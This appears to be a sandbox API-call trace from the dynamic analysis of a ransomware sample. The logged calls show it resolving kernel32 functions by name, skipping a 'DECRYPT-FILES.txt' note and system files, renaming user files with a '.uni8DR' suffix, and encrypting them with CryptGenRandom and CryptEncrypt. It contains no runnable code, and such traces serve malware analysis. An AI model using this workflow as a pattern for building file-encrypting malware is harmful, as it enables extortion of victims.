lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0080.115] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0080.115] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0080.115] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0080.115] lstrlenA (lpString="DECODEPOINTER") returned 13 [0080.115] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0080.115] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0080.115] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0080.115] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0080.115] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0080.115] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0080.115] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0080.115] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0080.115] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0080.116] lstrlenA (lpString="DELETEATOM") returned 10 [0080.116] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0080.116] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0080.116] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0080.116] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0080.116] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0080.116] lstrlenA (lpString="DELETEFIBER") returned 11 [0080.116] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0080.116] lstrlenA (lpString="DELETEFILEA") returned 11 [0080.116] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0080.116] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0080.116] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0080.116] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0080.116] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0080.116] lstrlenA (lpString="DELETEFILEW") returned 11 [0080.116] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0080.116] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0080.116] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0080.116] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0080.116] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0080.116] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0080.116] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0080.116] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0080.116] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0080.116] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0080.116] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0080.116] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0080.116] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0080.116] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0080.116] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0080.116] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0080.116] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0080.116] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0080.116] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0080.116] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0080.116] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0080.116] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0080.117] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0080.117] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0080.117] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0080.117] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0080.117] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0080.117] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0080.117] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0080.117] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0080.117] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0080.117] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0080.117] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0080.117] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0080.117] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0080.117] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0080.117] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0080.117] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0080.117] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0080.117] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0080.117] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0080.117] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0080.117] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0080.117] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0080.117] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0080.117] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0080.117] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0080.117] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0080.117] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0080.117] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0080.117] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0080.117] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0080.117] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0080.117] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0080.117] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0080.117] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0080.117] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0080.117] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0080.117] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0080.118] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0080.118] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0080.118] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0080.118] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0080.118] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0080.118] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0080.118] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0080.118] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0080.118] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0080.119] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\1b4dd67f29cb1962.customDestinations-ms") returned 128 [0080.119] wsprintfW (in: param_1=0x3f2d4b4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\1b4dd67f29cb1962.customDestinations-ms.uni8DR") returned 135 [0080.119] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\1b4dd67f29cb1962.customDestinations-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\1b4dd67f29cb1962.customdestinations-ms"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\1b4dd67f29cb1962.customDestinations-ms.uni8DR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\1b4dd67f29cb1962.customdestinations-ms.uni8dr"), dwFlags=0x0) returned 1 [0080.119] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.120] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.120] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.120] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe22bfd60, ftCreationTime.dwHighDateTime=0x1d2fab5, ftLastAccessTime.dwLowDateTime=0xcbe116e0, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xcbe116e0, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x1f68, dwReserved0=0x0, dwReserved1=0x0, cFileName="590aee7bdd69b59b.customDestinations-ms", cAlternateFileName="590AEE~1.CUS")) returned 1 [0080.120] lstrcmpiW (lpString1="590aee7bdd69b59b.customDestinations-ms", lpString2="DECRYPT-FILES.txt") returned -1 [0080.120] lstrcmpiW (lpString1="590aee7bdd69b59b.customDestinations-ms", lpString2="autorun.inf") returned -1 [0080.120] lstrcmpiW (lpString1="590aee7bdd69b59b.customDestinations-ms", lpString2="boot.ini") returned -1 [0080.120] lstrcmpiW (lpString1="590aee7bdd69b59b.customDestinations-ms", lpString2="desktop.ini") returned -1 [0080.120] lstrcmpiW (lpString1="590aee7bdd69b59b.customDestinations-ms", lpString2="ntuser.dat") returned -1 [0080.120] lstrcmpiW (lpString1="590aee7bdd69b59b.customDestinations-ms", lpString2="iconcache.db") returned -1 [0080.120] lstrcmpiW (lpString1="590aee7bdd69b59b.customDestinations-ms", lpString2="bootsect.bak") returned -1 [0080.120] lstrcmpiW (lpString1="590aee7bdd69b59b.customDestinations-ms", lpString2="ntuser.dat.log") returned -1 [0080.120] lstrcmpiW (lpString1="590aee7bdd69b59b.customDestinations-ms", lpString2="thumbs.db") returned -1 [0080.121] lstrcmpiW (lpString1="590aee7bdd69b59b.customDestinations-ms", lpString2="Bootfont.bin") returned -1 [0080.121] lstrlenW (lpString="590aee7bdd69b59b.customDestinations-ms") returned 38 [0080.121] lstrcmpiW (lpString1="customDestinations-ms", lpString2="lnk") returned -1 [0080.121] lstrcmpiW (lpString1="customDestinations-ms", lpString2="exe") returned -1 [0080.121] lstrcmpiW (lpString1="customDestinations-ms", lpString2="sys") returned -1 [0080.121] lstrcmpiW (lpString1="customDestinations-ms", lpString2="dll") returned -1 [0080.121] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\") returned 90 [0080.121] lstrlenW (lpString="590aee7bdd69b59b.customDestinations-ms") returned 38 [0080.121] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\" [0080.121] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\", lpString2="590aee7bdd69b59b.customDestinations-ms" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms" [0080.121] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0080.121] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\590aee7bdd69b59b.customdestinations-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x460 [0080.122] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x3f2d480 | out: lpFileSize=0x3f2d480*=8040) returned 1 [0080.122] CreateFileMappingW (hFile=0x460, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x464 [0080.122] MapViewOfFile (hFileMappingObject=0x464, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0080.122] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0080.122] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0080.123] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0080.124] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x100) returned 1 [0080.124] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0080.125] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.125] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0080.125] CloseHandle (hObject=0x464) returned 1 [0080.125] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.125] WriteFile (in: hFile=0x460, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d408, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d408*=0x108, lpOverlapped=0x0) returned 1 [0080.126] CloseHandle (hObject=0x0) returned 0 [0080.126] CloseHandle (hObject=0x460) returned 1 [0080.127] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.127] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.127] GetTickCount () returned 0x114c84f [0080.127] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0080.128] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0080.128] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0080.128] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0080.128] lstrlenA (lpString="kernel32.dll") returned 12 [0080.128] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0080.128] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0080.128] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0080.128] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0080.128] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0080.128] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0080.128] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0080.128] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0080.128] lstrlenA (lpString="ADDATOMA") returned 8 [0080.129] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0080.129] lstrlenA (lpString="ADDATOMW") returned 8 [0080.129] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0080.129] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0080.129] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0080.129] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0080.129] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0080.129] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0080.129] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0080.129] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0080.129] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0080.129] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0080.129] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0080.129] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0080.129] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0080.129] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0080.129] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0080.129] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0080.129] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0080.129] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0080.129] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0080.129] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0080.129] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0080.129] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0080.129] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0080.129] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0080.129] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0080.129] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0080.129] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0080.129] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0080.129] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0080.129] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0080.129] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0080.129] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0080.129] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0080.129] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0080.130] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0080.130] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0080.130] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0080.130] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0080.130] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0080.130] lstrlenA (lpString="BACKUPREAD") returned 10 [0080.130] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0080.130] lstrlenA (lpString="BACKUPSEEK") returned 10 [0080.130] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0080.130] lstrlenA (lpString="BACKUPWRITE") returned 11 [0080.130] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0080.130] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0080.130] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0080.130] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0080.130] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0080.130] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0080.130] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0080.130] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0080.130] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0080.130] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0080.130] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0080.130] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0080.130] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0080.130] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0080.130] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0080.130] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0080.130] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0080.130] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0080.130] lstrcpyA 